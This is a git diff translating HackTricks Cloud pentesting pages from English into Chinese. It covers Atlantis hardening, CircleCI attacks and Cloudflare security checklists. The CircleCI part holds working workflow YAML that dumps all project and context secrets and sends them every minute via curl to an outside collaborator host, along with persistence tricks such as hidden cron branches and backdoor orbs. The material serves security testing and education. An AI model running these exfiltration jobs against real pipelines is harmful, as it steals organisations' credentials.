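# 假设示例:向 Atlantis 的 webhook 端点发送未签名请求,观察是否被拒绝
curl -s -o /dev/null -w '%{http_code}\n' -X POST 'https://atlantis.example.com/events' \
  -H 'Content-Type: application/json' \
  -H 'X-GitHub-Event: ping' \
  -d '{"zen":"test"}'
# 配置了 webhook secret 时,未签名请求通常会被拒绝;若被正常接受,则更容易被伪造请求滥用
```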
+此标志确保您的 Atlantis 安装不会与您不控制的仓库一起使用。有关更多详细信息,请参见 `atlantis server --help`。 #### Protect Terraform Planning -If attackers submitting pull requests with malicious Terraform code is in your threat model then you must be aware that `terraform apply` approvals are not enough. It is possible to run malicious code in a `terraform plan` using the [`external` data source](https://registry.terraform.io/providers/hashicorp/external/latest/docs/data-sources/data_source) or by specifying a malicious provider. This code could then exfiltrate your credentials. +如果攻击者提交带有恶意 Terraform 代码的拉取请求在您的威胁模型中,那么您必须意识到 `terraform apply` 的批准是不够的。可以使用 [`external` 数据源](https://registry.terraform.io/providers/hashicorp/external/latest/docs/data-sources/data_source) 或通过指定恶意提供程序在 `terraform plan` 中运行恶意代码。然后,这段代码可能会窃取您的凭据。 -To prevent this, you could: +为了防止这种情况,您可以: -1. Bake providers into the Atlantis image or host and deny egress in production. -2. Implement the provider registry protocol internally and deny public egress, that way you control who has write access to the registry. -3. Modify your [server-side repo configuration](https://www.runatlantis.io/docs/server-side-repo-config.html)'s `plan` step to validate against the use of disallowed providers or data sources or PRs from not allowed users. You could also add in extra validation at this point, e.g. requiring a "thumbs-up" on the PR before allowing the `plan` to continue. Conftest could be of use here. +1. 将提供程序打包到 Atlantis 镜像中或托管并在生产中拒绝出站。 +2. 在内部实现提供程序注册协议并拒绝公共出站,这样您可以控制谁有写入注册表的权限。 +3. 修改您的 [服务器端仓库配置](https://www.runatlantis.io/docs/server-side-repo-config.html) 的 `plan` 步骤,以验证不允许的提供程序或数据源的使用或不允许用户的 PR。您还可以在此时添加额外的验证,例如在允许 `plan` 继续之前要求 PR 上的“点赞”。Conftest 在这里可能会有用。 #### Webhook Secrets -Atlantis should be run with Webhook secrets set via the `$ATLANTIS_GH_WEBHOOK_SECRET`/`$ATLANTIS_GITLAB_WEBHOOK_SECRET` environment variables. Even with the `--repo-allowlist` flag set, without a webhook secret, attackers could make requests to Atlantis posing as a repository that is allowlisted. Webhook secrets ensure that the webhook requests are actually coming from your VCS provider (GitHub or GitLab). +Atlantis 应该通过 `$ATLANTIS_GH_WEBHOOK_SECRET`/`$ATLANTIS_GITLAB_WEBHOOK_SECRET` 环境变量设置 webhook secrets。即使设置了 `--repo-allowlist` 标志,如果没有 webhook secret,攻击者也可以伪装成允许列表中的仓库向 Atlantis 发出请求。Webhook secrets 确保 webhook 请求实际上来自您的 VCS 提供商(GitHub 或 GitLab)。 -If you are using Azure DevOps, instead of webhook secrets add a basic username and password. +如果您使用 Azure DevOps,请添加基本用户名和密码,而不是 webhook secrets。 #### Azure DevOps Basic Authentication -Azure DevOps supports sending a basic authentication header in all webhook events. This requires using an HTTPS URL for your webhook location. +Azure DevOps 支持在所有 webhook 事件中发送基本身份验证头。这需要为您的 webhook 位置使用 HTTPS URL。 #### SSL/HTTPS -If you're using webhook secrets but your traffic is over HTTP then the webhook secrets could be stolen. Enable SSL/HTTPS using the `--ssl-cert-file` and `--ssl-key-file` flags. +如果您使用 webhook secrets,但您的流量是通过 HTTP,那么 webhook secrets 可能会被窃取。使用 `--ssl-cert-file` 和 `--ssl-key-file` 标志启用 SSL/HTTPS。 #### Enable Authentication on Atlantis Web Server -It is very recommended to enable authentication in the web service. Enable BasicAuth using the `--web-basic-auth=true` and setup a username and a password using `--web-username=yourUsername` and `--web-password=yourPassword` flags. 
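把上面几项缓解措施(仓库白名单、webhook secret、TLS、Web 基本认证)组合起来,启动命令大致如下;这只是一个假设性的示例,域名、证书路径与凭据都是占位符:

```bash
# 假设示例:以较安全的标志组合启动 atlantis server(所有值均为占位符)
export ATLANTIS_GH_TOKEN='<github-token>'
export ATLANTIS_GH_WEBHOOK_SECRET="$(openssl rand -hex 32)"   # 同一个值也要配置到 git 服务器的 webhook 上
atlantis server \
  --atlantis-url='https://atlantis.example.com' \
  --gh-user='atlantis-bot' \
  --repo-allowlist='github.com/yourorg/*' \
  --ssl-cert-file=/etc/atlantis/tls.crt --ssl-key-file=/etc/atlantis/tls.key \
  --web-basic-auth=true --web-username='admin' --web-password='<strong-password>'
```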
+强烈建议在 Web 服务中启用身份验证。使用 `--web-basic-auth=true` 启用 BasicAuth,并使用 `--web-username=yourUsername` 和 `--web-password=yourPassword` 标志设置用户名和密码。 -You can also pass these as environment variables `ATLANTIS_WEB_BASIC_AUTH=true` `ATLANTIS_WEB_USERNAME=yourUsername` and `ATLANTIS_WEB_PASSWORD=yourPassword`. +您还可以将这些作为环境变量传递 `ATLANTIS_WEB_BASIC_AUTH=true` `ATLANTIS_WEB_USERNAME=yourUsername` 和 `ATLANTIS_WEB_PASSWORD=yourPassword`。 ### References @@ -386,7 +370,3 @@ You can also pass these as environment variables `ATLANTIS_WEB_BASIC_AUTH=true` - [**https://www.runatlantis.io/docs/provider-credentials.html**](https://www.runatlantis.io/docs/provider-credentials.html) {{#include ../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/circleci-security.md b/src/pentesting-ci-cd/circleci-security.md index 8b8a1fea1..4320ea6d3 100644 --- a/src/pentesting-ci-cd/circleci-security.md +++ b/src/pentesting-ci-cd/circleci-security.md @@ -1,259 +1,235 @@ -# CircleCI Security +# CircleCI 安全 {{#include ../banners/hacktricks-training.md}} -### Basic Information +### 基本信息 -[**CircleCI**](https://circleci.com/docs/2.0/about-circleci/) is a Continuos Integration platform where you can **define templates** indicating what you want it to do with some code and when to do it. This way you can **automate testing** or **deployments** directly **from your repo master branch** for example. +[**CircleCI**](https://circleci.com/docs/2.0/about-circleci/) 是一个持续集成平台,您可以在其中**定义模板**,指示您希望它对某些代码做什么以及何时执行。通过这种方式,您可以**自动化测试**或**部署**,例如直接**从您的代码库主分支**进行。 -### Permissions +### 权限 -**CircleCI** **inherits the permissions** from github and bitbucket related to the **account** that logs in.\ -In my testing I checked that as long as you have **write permissions over the repo in github**, you are going to be able to **manage its project settings in CircleCI** (set new ssh keys, get project api keys, create new branches with new CircleCI configs...). +**CircleCI** **继承了**与登录的**账户**相关的github和bitbucket的权限。\ +在我的测试中,我检查到,只要您在github上对代码库拥有**写权限**,您就能够**管理CircleCI中的项目设置**(设置新的ssh密钥,获取项目api密钥,使用新的CircleCI配置创建新分支...)。 -However, you need to be a a **repo admin** in order to **convert the repo into a CircleCI project**. +然而,您需要是**代码库管理员**才能**将代码库转换为CircleCI项目**。 -### Env Variables & Secrets +### 环境变量和秘密 -According to [**the docs**](https://circleci.com/docs/2.0/env-vars/) there are different ways to **load values in environment variables** inside a workflow. +根据[**文档**](https://circleci.com/docs/2.0/env-vars/),在工作流中有不同的方法来**加载环境变量中的值**。 -#### Built-in env variables +#### 内置环境变量 -Every container run by CircleCI will always have [**specific env vars defined in the documentation**](https://circleci.com/docs/2.0/env-vars/#built-in-environment-variables) like `CIRCLE_PR_USERNAME`, `CIRCLE_PROJECT_REPONAME` or `CIRCLE_USERNAME`. 
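一个很小的假设性示例:在任意 job 的 `run` step 中执行下面的命令,即可查看当前容器里实际注入了哪些内置变量:

```bash
# 假设示例:列出 CircleCI 注入的内置环境变量(名称以 CIRCLE 开头)
echo "$CIRCLE_PROJECT_REPONAME / $CIRCLE_BRANCH / $CIRCLE_USERNAME"
env | grep '^CIRCLE' | sort
```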
+每个由CircleCI运行的容器将始终具有[**文档中定义的特定环境变量**](https://circleci.com/docs/2.0/env-vars/#built-in-environment-variables),如`CIRCLE_PR_USERNAME`、`CIRCLE_PROJECT_REPONAME`或`CIRCLE_USERNAME`。 -#### Clear text - -You can declare them in clear text inside a **command**: +#### 明文 +您可以在**命令**中以明文声明它们: ```yaml - run: - name: "set and echo" - command: | - SECRET="A secret" - echo $SECRET +name: "set and echo" +command: | +SECRET="A secret" +echo $SECRET ``` - -You can declare them in clear text inside the **run environment**: - +您可以在 **run environment** 中以明文声明它们: ```yaml - run: - name: "set and echo" - command: echo $SECRET - environment: - SECRET: A secret +name: "set and echo" +command: echo $SECRET +environment: +SECRET: A secret ``` - -You can declare them in clear text inside the **build-job environment**: - +您可以在 **build-job environment** 中以明文声明它们: ```yaml jobs: - build-job: - docker: - - image: cimg/base:2020.01 - environment: - SECRET: A secret +build-job: +docker: +- image: cimg/base:2020.01 +environment: +SECRET: A secret ``` - -You can declare them in clear text inside the **environment of a container**: - +您可以在 **容器的环境** 中以明文声明它们: ```yaml jobs: - build-job: - docker: - - image: cimg/base:2020.01 - environment: - SECRET: A secret +build-job: +docker: +- image: cimg/base:2020.01 +environment: +SECRET: A secret ``` +#### 项目秘密 -#### Project Secrets - -These are **secrets** that are only going to be **accessible** by the **project** (by **any branch**).\ -You can see them **declared in** _https://app.circleci.com/settings/project/github/\/\/environment-variables_ +这些是**秘密**,只有**项目**(通过**任何分支**)可以**访问**。\ +您可以在 _https://app.circleci.com/settings/project/github/\/\/environment-variables_ 中查看它们的**声明**。 ![](<../images/image (129).png>) > [!CAUTION] -> The "**Import Variables**" functionality allows to **import variables from other projects** to this one. +> "**导入变量**" 功能允许从其他项目**导入变量**到这个项目。 -#### Context Secrets +#### 上下文秘密 -These are secrets that are **org wide**. By **default any repo** is going to be able to **access any secret** stored here: +这些是**组织范围内**的秘密。默认情况下,**任何仓库**都可以**访问**存储在这里的任何秘密: ![](<../images/image (123).png>) > [!TIP] -> However, note that a different group (instead of All members) can be **selected to only give access to the secrets to specific people**.\ -> This is currently one of the best ways to **increase the security of the secrets**, to not allow everybody to access them but just some people. +> 但是,请注意,可以选择不同的组(而不是所有成员)来**仅向特定人员提供秘密的访问权限**。\ +> 这目前是**提高秘密安全性**的最佳方法之一,不允许所有人访问,而只是一些人。 -### Attacks +### 攻击 -#### Search Clear Text Secrets +#### 搜索明文秘密 -If you have **access to the VCS** (like github) check the file `.circleci/config.yml` of **each repo on each branch** and **search** for potential **clear text secrets** stored in there. +如果您有**访问VCS**(如github),请检查**每个仓库每个分支**的文件 `.circleci/config.yml` 并**搜索**潜在的**明文秘密**。 -#### Secret Env Vars & Context enumeration +#### 秘密环境变量和上下文枚举 -Checking the code you can find **all the secrets names** that are being **used** in each `.circleci/config.yml` file. You can also get the **context names** from those files or check them in the web console: _https://app.circleci.com/settings/organization/github/\/contexts_. 
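一个假设性的枚举草图:假设已把组织内能访问的仓库克隆到同一目录下,可以用下面的命令批量提取各 `.circleci/config.yml` 中引用的变量名和 context 名称:

```bash
# 假设示例:批量枚举 CircleCI 配置中引用的环境变量名与 context 名称(目录结构为假设)
grep -hoE '\$[A-Z_][A-Z0-9_]*' */.circleci/config.yml 2>/dev/null | sort -u
grep -n 'context:' */.circleci/config.yml 2>/dev/null
```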
+检查代码,您可以找到在每个 `.circleci/config.yml` 文件中**使用**的**所有秘密名称**。您还可以从这些文件中获取**上下文名称**,或在网页控制台中查看:_https://app.circleci.com/settings/organization/github/\/contexts_。 -#### Exfiltrate Project secrets +#### 外泄项目秘密 > [!WARNING] -> In order to **exfiltrate ALL** the project and context **SECRETS** you **just** need to have **WRITE** access to **just 1 repo** in the whole github org (_and your account must have access to the contexts but by default everyone can access every context_). +> 为了**外泄所有**项目和上下文的**秘密**,您**只需**对整个github组织中的**1个仓库**拥有**写入**权限(_并且您的账户必须有访问上下文的权限,但默认情况下每个人都可以访问每个上下文_)。 > [!CAUTION] -> The "**Import Variables**" functionality allows to **import variables from other projects** to this one. Therefore, an attacker could **import all the project variables from all the repos** and then **exfiltrate all of them together**. - -All the project secrets always are set in the env of the jobs, so just calling env and obfuscating it in base64 will exfiltrate the secrets in the **workflows web log console**: +> "**导入变量**" 功能允许从其他项目**导入变量**到这个项目。因此,攻击者可以**导入所有仓库的所有项目变量**,然后**一起外泄所有变量**。 +所有项目秘密始终在作业的环境中设置,因此只需调用环境并将其混淆为base64,就会在**工作流网页日志控制台**中外泄秘密: ```yaml version: 2.1 jobs: - exfil-env: - docker: - - image: cimg/base:stable - steps: - - checkout - - run: - name: "Exfil env" - command: "env | base64" +exfil-env: +docker: +- image: cimg/base:stable +steps: +- checkout +- run: +name: "Exfil env" +command: "env | base64" workflows: - exfil-env-workflow: - jobs: - - exfil-env +exfil-env-workflow: +jobs: +- exfil-env ``` - -If you **don't have access to the web console** but you have **access to the repo** and you know that CircleCI is used, you can just **create a workflow** that is **triggered every minute** and that **exfils the secrets to an external address**: - +如果您**无法访问网络控制台**,但您有**对代码库的访问权限**并且知道使用了CircleCI,您可以**创建一个工作流**,该工作流**每分钟触发一次**并且**将秘密导出到外部地址**: ```yaml version: 2.1 jobs: - exfil-env: - docker: - - image: cimg/base:stable - steps: - - checkout - - run: - name: "Exfil env" - command: "curl https://lyn7hzchao276nyvooiekpjn9ef43t.burpcollaborator.net/?a=`env | base64 -w0`" +exfil-env: +docker: +- image: cimg/base:stable +steps: +- checkout +- run: +name: "Exfil env" +command: "curl https://lyn7hzchao276nyvooiekpjn9ef43t.burpcollaborator.net/?a=`env | base64 -w0`" # I filter by the repo branch where this config.yaml file is located: circleci-project-setup workflows: - exfil-env-workflow: - triggers: - - schedule: - cron: "* * * * *" - filters: - branches: - only: - - circleci-project-setup - jobs: - - exfil-env +exfil-env-workflow: +triggers: +- schedule: +cron: "* * * * *" +filters: +branches: +only: +- circleci-project-setup +jobs: +- exfil-env ``` +#### 导出上下文秘密 -#### Exfiltrate Context Secrets - -You need to **specify the context name** (this will also exfiltrate the project secrets): - +您需要**指定上下文名称**(这也将导出项目秘密): ```yaml version: 2.1 jobs: - exfil-env: - docker: - - image: cimg/base:stable - steps: - - checkout - - run: - name: "Exfil env" - command: "env | base64" +exfil-env: +docker: +- image: cimg/base:stable +steps: +- checkout +- run: +name: "Exfil env" +command: "env | base64" workflows: - exfil-env-workflow: - jobs: - - exfil-env: - context: Test-Context +exfil-env-workflow: +jobs: +- exfil-env: +context: Test-Context ``` - -If you **don't have access to the web console** but you have **access to the repo** and you know that CircleCI is used, you can just **modify a workflow** that is **triggered every minute** and that **exfils the secrets to an external address**: - 
+如果您**无法访问网络控制台**,但您有**对代码库的访问权限**并且知道使用了CircleCI,您可以**修改一个每分钟触发的工作流**,并且该工作流**将秘密导出到外部地址**: ```yaml version: 2.1 jobs: - exfil-env: - docker: - - image: cimg/base:stable - steps: - - checkout - - run: - name: "Exfil env" - command: "curl https://lyn7hzchao276nyvooiekpjn9ef43t.burpcollaborator.net/?a=`env | base64 -w0`" +exfil-env: +docker: +- image: cimg/base:stable +steps: +- checkout +- run: +name: "Exfil env" +command: "curl https://lyn7hzchao276nyvooiekpjn9ef43t.burpcollaborator.net/?a=`env | base64 -w0`" # I filter by the repo branch where this config.yaml file is located: circleci-project-setup workflows: - exfil-env-workflow: - triggers: - - schedule: - cron: "* * * * *" - filters: - branches: - only: - - circleci-project-setup - jobs: - - exfil-env: - context: Test-Context +exfil-env-workflow: +triggers: +- schedule: +cron: "* * * * *" +filters: +branches: +only: +- circleci-project-setup +jobs: +- exfil-env: +context: Test-Context ``` - > [!WARNING] -> Just creating a new `.circleci/config.yml` in a repo **isn't enough to trigger a circleci build**. You need to **enable it as a project in the circleci console**. +> 仅仅在一个仓库中创建一个新的 `.circleci/config.yml` **并不足以触发 circleci 构建**。你需要在 **circleci 控制台中将其启用为项目**。 -#### Escape to Cloud +#### 逃往云端 -**CircleCI** gives you the option to run **your builds in their machines or in your own**.\ -By default their machines are located in GCP, and you initially won't be able to fid anything relevant. However, if a victim is running the tasks in **their own machines (potentially, in a cloud env)**, you might find a **cloud metadata endpoint with interesting information on it**. - -Notice that in the previous examples it was launched everything inside a docker container, but you can also **ask to launch a VM machine** (which may have different cloud permissions): +**CircleCI** 让你可以选择在 **他们的机器上或你自己的机器上运行构建**。\ +默认情况下,他们的机器位于 GCP,你最初无法找到任何相关信息。然而,如果受害者在 **他们自己的机器上(可能是在云环境中)** 运行任务,你可能会找到一个 **包含有趣信息的云元数据端点**。 +请注意,在之前的示例中,一切都是在 docker 容器内启动的,但你也可以 **请求启动一台虚拟机**(这可能具有不同的云权限): ```yaml jobs: - exfil-env: - #docker: - # - image: cimg/base:stable - machine: - image: ubuntu-2004:current +exfil-env: +#docker: +# - image: cimg/base:stable +machine: +image: ubuntu-2004:current ``` - -Or even a docker container with access to a remote docker service: - +或者甚至是一个可以访问远程 docker 服务的 docker 容器: ```yaml jobs: - exfil-env: - docker: - - image: cimg/base:stable - steps: - - checkout - - setup_remote_docker: - version: 19.03.13 +exfil-env: +docker: +- image: cimg/base:stable +steps: +- checkout +- setup_remote_docker: +version: 19.03.13 ``` +#### 持久性 -#### Persistence - -- It's possible to **create** **user tokens in CircleCI** to access the API endpoints with the users access. - - _https://app.circleci.com/settings/user/tokens_ -- It's possible to **create projects tokens** to access the project with the permissions given to the token. - - _https://app.circleci.com/settings/project/github/\/\/api_ -- It's possible to **add SSH keys** to the projects. - - _https://app.circleci.com/settings/project/github/\/\/ssh_ -- It's possible to **create a cron job in hidden branch** in an unexpected project that is **leaking** all the **context env** vars everyday. - - Or even create in a branch / modify a known job that will **leak** all context and **projects secrets** everyday. 
-- If you are a github owner you can **allow unverified orbs** and configure one in a job as **backdoor** -- You can find a **command injection vulnerability** in some task and **inject commands** via a **secret** modifying its value +- 可以在 CircleCI 中 **创建** **用户令牌** 以使用用户的访问权限访问 API 端点。 +- _https://app.circleci.com/settings/user/tokens_ +- 可以 **创建项目令牌** 以使用令牌授予的权限访问项目。 +- _https://app.circleci.com/settings/project/github/\/\/api_ +- 可以 **向项目添加 SSH 密钥**。 +- _https://app.circleci.com/settings/project/github/\/\/ssh_ +- 可以在一个意外的项目中 **创建一个隐藏分支的 cron 作业**,每天 **泄露** 所有 **上下文环境** 变量。 +- 或者甚至在一个分支中创建/修改一个已知的作业,每天 **泄露** 所有上下文和 **项目机密**。 +- 如果你是 GitHub 的所有者,你可以 **允许未验证的 orbs** 并在作业中将其配置为 **后门**。 +- 你可以在某些任务中找到 **命令注入漏洞** 并通过 **秘密** 修改其值来 **注入命令**。 {{#include ../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/cloudflare-security/README.md b/src/pentesting-ci-cd/cloudflare-security/README.md index 77d2c2c50..ac8255488 100644 --- a/src/pentesting-ci-cd/cloudflare-security/README.md +++ b/src/pentesting-ci-cd/cloudflare-security/README.md @@ -2,13 +2,13 @@ {{#include ../../banners/hacktricks-training.md}} -In a Cloudflare account there are some **general settings and services** that can be configured. In this page we are going to **analyze the security related settings of each section:** +在 Cloudflare 账户中,有一些 **常规设置和服务** 可以配置。在本页面中,我们将 **分析每个部分与安全相关的设置:**
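在逐节审查之前,可以先用一个假设性的 API 草图快速列出账户与区域,作为后续各节检查的起点(假设已创建一个只读权限的 API Token,且本机装有 `jq`):

```bash
# 假设示例:列出 Cloudflare 账户与区域(令牌为占位符,jq 仅用于格式化输出)
export CF_API_TOKEN='<cloudflare-api-token>'
curl -s -H "Authorization: Bearer $CF_API_TOKEN" 'https://api.cloudflare.com/client/v4/accounts' | jq '.result[] | {id, name}'
curl -s -H "Authorization: Bearer $CF_API_TOKEN" 'https://api.cloudflare.com/client/v4/zones' | jq '.result[] | {id, name, status}'
```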
## Websites -Review each with: +逐一检查: {{#ref}} cloudflare-domains.md @@ -16,9 +16,9 @@ cloudflare-domains.md ### Domain Registration -- [ ] In **`Transfer Domains`** check that it's not possible to transfer any domain. +- [ ] 在 **`Transfer Domains`** 中检查是否无法转移任何域名。 -Review each with: +逐一检查: {{#ref}} cloudflare-domains.md @@ -26,39 +26,39 @@ cloudflare-domains.md ## Analytics -_I couldn't find anything to check for a config security review._ +_我找不到任何可以检查配置安全审查的内容。_ ## Pages -On each Cloudflare's page: +在每个 Cloudflare 页面上: -- [ ] Check for **sensitive information** in the **`Build log`**. -- [ ] Check for **sensitive information** in the **Github repository** assigned to the pages. -- [ ] Check for potential github repo compromise via **workflow command injection** or `pull_request_target` compromise. More info in the [**Github Security page**](../github-security/). -- [ ] Check for **vulnerable functions** in the `/fuctions` directory (if any), check the **redirects** in the `_redirects` file (if any) and **misconfigured headers** in the `_headers` file (if any). -- [ ] Check for **vulnerabilities** in the **web page** via **blackbox** or **whitebox** if you can **access the code** -- [ ] In the details of each page `//pages/view/blocklist/settings/functions`. Check for **sensitive information** in the **`Environment variables`**. -- [ ] In the details page check also the **build command** and **root directory** for **potential injections** to compromise the page. +- [ ] 检查 **`Build log`** 中的 **敏感信息**。 +- [ ] 检查分配给页面的 **Github 仓库** 中的 **敏感信息**。 +- [ ] 检查通过 **workflow command injection** 或 `pull_request_target` 可能导致的 GitHub 仓库泄露。更多信息请参见 [**Github Security page**](../github-security/)。 +- [ ] 检查 `/fuctions` 目录中的 **脆弱函数**(如果有),检查 `_redirects` 文件中的 **重定向**(如果有)和 `_headers` 文件中的 **错误配置的头部**(如果有)。 +- [ ] 通过 **blackbox** 或 **whitebox** 检查 **网页** 中的 **漏洞**,如果您可以 **访问代码**。 +- [ ] 在每个页面的详细信息 `//pages/view/blocklist/settings/functions` 中,检查 **`Environment variables`** 中的 **敏感信息**。 +- [ ] 在详细信息页面中,还要检查 **构建命令** 和 **根目录** 以查找 **潜在注入** 以危害页面。 ## **Workers** -On each Cloudflare's worker check: +在每个 Cloudflare 的 worker 中检查: -- [ ] The triggers: What makes the worker trigger? Can a **user send data** that will be **used** by the worker? -- [ ] In the **`Settings`**, check for **`Variables`** containing **sensitive information** -- [ ] Check the **code of the worker** and search for **vulnerabilities** (specially in places where the user can manage the input) - - Check for SSRFs returning the indicated page that you can control - - Check XSSs executing JS inside a svg image - - It is possible that the worker interacts with other internal services. For example, a worker may interact with a R2 bucket storing information in it obtained from the input. In that case, it would be necessary to check what capabilities does the worker have over the R2 bucket and how could it be abused from the user input. +- [ ] 触发器:是什么使 worker 触发?用户是否可以发送将被 worker **使用** 的数据? +- [ ] 在 **`Settings`** 中,检查包含 **敏感信息** 的 **`Variables`**。 +- [ ] 检查 **worker 的代码** 并搜索 **漏洞**(特别是在用户可以管理输入的地方)。 +- 检查 SSRFs 返回您可以控制的指定页面 +- 检查在 svg 图像内执行 JS 的 XSS +- worker 可能与其他内部服务交互。例如,worker 可能与 R2 存储桶交互,从输入中获取信息。在这种情况下,需要检查 worker 对 R2 存储桶的权限以及如何可能被用户输入滥用。 > [!WARNING] -> Note that by default a **Worker is given a URL** such as `..workers.dev`. The user can set it to a **subdomain** but you can always access it with that **original URL** if you know it. 
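可以用一个假设性的探测命令确认该默认 URL 是否仍然可以直接访问(worker 名称与账户子域均为占位符):

```bash
# 假设示例:探测 Worker 的默认 workers.dev URL 是否可直接访问
curl -s -o /dev/null -w '%{http_code}\n' 'https://<worker-name>.<account-subdomain>.workers.dev'
```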
+> 请注意,默认情况下,**Worker 会被赋予一个 URL**,例如 `..workers.dev`。用户可以将其设置为 **子域名**,但如果您知道该 **原始 URL**,则始终可以通过该 URL 访问它。 ## R2 -On each R2 bucket check: +在每个 R2 存储桶中检查: -- [ ] Configure **CORS Policy**. +- [ ] 配置 **CORS 策略**。 ## Stream @@ -70,8 +70,8 @@ TODO ## Security Center -- [ ] If possible, run a **`Security Insights`** **scan** and an **`Infrastructure`** **scan**, as they will **highlight** interesting information **security** wise. -- [ ] Just **check this information** for security misconfigurations and interesting info +- [ ] 如果可能,运行 **`Security Insights`** **扫描** 和 **`Infrastructure`** **扫描**,因为它们将 **突出** 有趣的信息 **安全** 方面。 +- [ ] 仅检查此信息以查找安全错误配置和有趣的信息 ## Turnstile @@ -86,53 +86,49 @@ cloudflare-zero-trust-network.md ## Bulk Redirects > [!NOTE] -> Unlike [Dynamic Redirects](https://developers.cloudflare.com/rules/url-forwarding/dynamic-redirects/), [**Bulk Redirects**](https://developers.cloudflare.com/rules/url-forwarding/bulk-redirects/) are essentially static — they do **not support any string replacement** operations or regular expressions. However, you can configure URL redirect parameters that affect their URL matching behavior and their runtime behavior. +> 与 [Dynamic Redirects](https://developers.cloudflare.com/rules/url-forwarding/dynamic-redirects/) 不同, [**Bulk Redirects**](https://developers.cloudflare.com/rules/url-forwarding/bulk-redirects/) 本质上是静态的——它们不支持任何字符串替换操作或正则表达式。但是,您可以配置影响其 URL 匹配行为和运行时行为的 URL 重定向参数。 -- [ ] Check that the **expressions** and **requirements** for redirects **make sense**. -- [ ] Check also for **sensitive hidden endpoints** that you contain interesting info. +- [ ] 检查 **重定向的表达式** 和 **要求** 是否 **合理**。 +- [ ] 还要检查是否存在包含有趣信息的 **敏感隐藏端点**。 ## Notifications -- [ ] Check the **notifications.** These notifications are recommended for security: - - `Usage Based Billing` - - `HTTP DDoS Attack Alert` - - `Layer 3/4 DDoS Attack Alert` - - `Advanced HTTP DDoS Attack Alert` - - `Advanced Layer 3/4 DDoS Attack Alert` - - `Flow-based Monitoring: Volumetric Attack` - - `Route Leak Detection Alert` - - `Access mTLS Certificate Expiration Alert` - - `SSL for SaaS Custom Hostnames Alert` - - `Universal SSL Alert` - - `Script Monitor New Code Change Detection Alert` - - `Script Monitor New Domain Alert` - - `Script Monitor New Malicious Domain Alert` - - `Script Monitor New Malicious Script Alert` - - `Script Monitor New Malicious URL Alert` - - `Script Monitor New Scripts Alert` - - `Script Monitor New Script Exceeds Max URL Length Alert` - - `Advanced Security Events Alert` - - `Security Events Alert` -- [ ] Check all the **destinations**, as there could be **sensitive info** (basic http auth) in webhook urls. 
Make also sure webhook urls use **HTTPS** - - [ ] As extra check, you could try to **impersonate a cloudflare notification** to a third party, maybe you can somehow **inject something dangerous** +- [ ] 检查 **通知**。这些通知建议用于安全: +- `Usage Based Billing` +- `HTTP DDoS Attack Alert` +- `Layer 3/4 DDoS Attack Alert` +- `Advanced HTTP DDoS Attack Alert` +- `Advanced Layer 3/4 DDoS Attack Alert` +- `Flow-based Monitoring: Volumetric Attack` +- `Route Leak Detection Alert` +- `Access mTLS Certificate Expiration Alert` +- `SSL for SaaS Custom Hostnames Alert` +- `Universal SSL Alert` +- `Script Monitor New Code Change Detection Alert` +- `Script Monitor New Domain Alert` +- `Script Monitor New Malicious Domain Alert` +- `Script Monitor New Malicious Script Alert` +- `Script Monitor New Malicious URL Alert` +- `Script Monitor New Scripts Alert` +- `Script Monitor New Script Exceeds Max URL Length Alert` +- `Advanced Security Events Alert` +- `Security Events Alert` +- [ ] 检查所有 **目标**,因为 webhook URL 中可能存在 **敏感信息**(基本 http 身份验证)。还要确保 webhook URL 使用 **HTTPS**。 +- [ ] 作为额外检查,您可以尝试 **冒充 Cloudflare 通知** 给第三方,也许您可以以某种方式 **注入一些危险的东西**。 ## Manage Account -- [ ] It's possible to see the **last 4 digits of the credit card**, **expiration** time and **billing address** in **`Billing` -> `Payment info`**. -- [ ] It's possible to see the **plan type** used in the account in **`Billing` -> `Subscriptions`**. -- [ ] In **`Members`** it's possible to see all the members of the account and their **role**. Note that if the plan type isn't Enterprise, only 2 roles exist: Administrator and Super Administrator. But if the used **plan is Enterprise**, [**more roles**](https://developers.cloudflare.com/fundamentals/account-and-billing/account-setup/account-roles/) can be used to follow the least privilege principle. - - Therefore, whenever possible is **recommended** to use the **Enterprise plan**. -- [ ] In Members it's possible to check which **members** has **2FA enabled**. **Every** user should have it enabled. +- [ ] 可以在 **`Billing` -> `Payment info`** 中查看 **信用卡的最后 4 位数字**、**到期** 时间和 **账单地址**。 +- [ ] 可以在 **`Billing` -> `Subscriptions`** 中查看账户中使用的 **计划类型**。 +- [ ] 在 **`Members`** 中,可以查看账户的所有成员及其 **角色**。请注意,如果计划类型不是企业版,则仅存在 2 个角色:管理员和超级管理员。但如果使用的 **计划是企业版**,则可以使用 [**更多角色**](https://developers.cloudflare.com/fundamentals/account-and-billing/account-setup/account-roles/) 来遵循最小权限原则。 +- 因此,建议在可能的情况下使用 **企业计划**。 +- [ ] 在成员中,可以检查哪些 **成员** 启用了 **2FA**。**每个** 用户都应该启用它。 > [!NOTE] -> Note that fortunately the role **`Administrator`** doesn't give permissions to manage memberships (**cannot escalate privs or invite** new members) +> 请注意,幸运的是,角色 **`Administrator`** 不授予管理成员资格的权限(**无法提升权限或邀请** 新成员)。 ## DDoS Investigation -[Check this part](cloudflare-domains.md#cloudflare-ddos-protection). +[检查此部分](cloudflare-domains.md#cloudflare-ddos-protection)。 {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/cloudflare-security/cloudflare-domains.md b/src/pentesting-ci-cd/cloudflare-security/cloudflare-domains.md index 02989e685..fb24eb38f 100644 --- a/src/pentesting-ci-cd/cloudflare-security/cloudflare-domains.md +++ b/src/pentesting-ci-cd/cloudflare-security/cloudflare-domains.md @@ -2,31 +2,31 @@ {{#include ../../banners/hacktricks-training.md}} -In each TLD configured in Cloudflare there are some **general settings and services** that can be configured. 
In this page we are going to **analyze the security related settings of each section:** +在 Cloudflare 配置的每个 TLD 中,有一些 **常规设置和服务** 可以配置。在本页面中,我们将 **分析每个部分的安全相关设置:**
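在逐项核对之前,可以先从外部对域名做几个快速检查,结果与下文 DNS 等小节的检查点相对应(`example.com` 为占位符):

```bash
# 假设示例:从外部快速核对域名的 DNSSEC 与代理状态
dig +short DS example.com       # 存在 DS 记录通常表示已在注册局启用 DNSSEC
dig +short A example.com        # 开启代理时应返回 Cloudflare 的 IP,而不是源站 IP
curl -sI https://example.com | grep -i '^server:'   # 经 Cloudflare 代理时通常为 "server: cloudflare"
```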
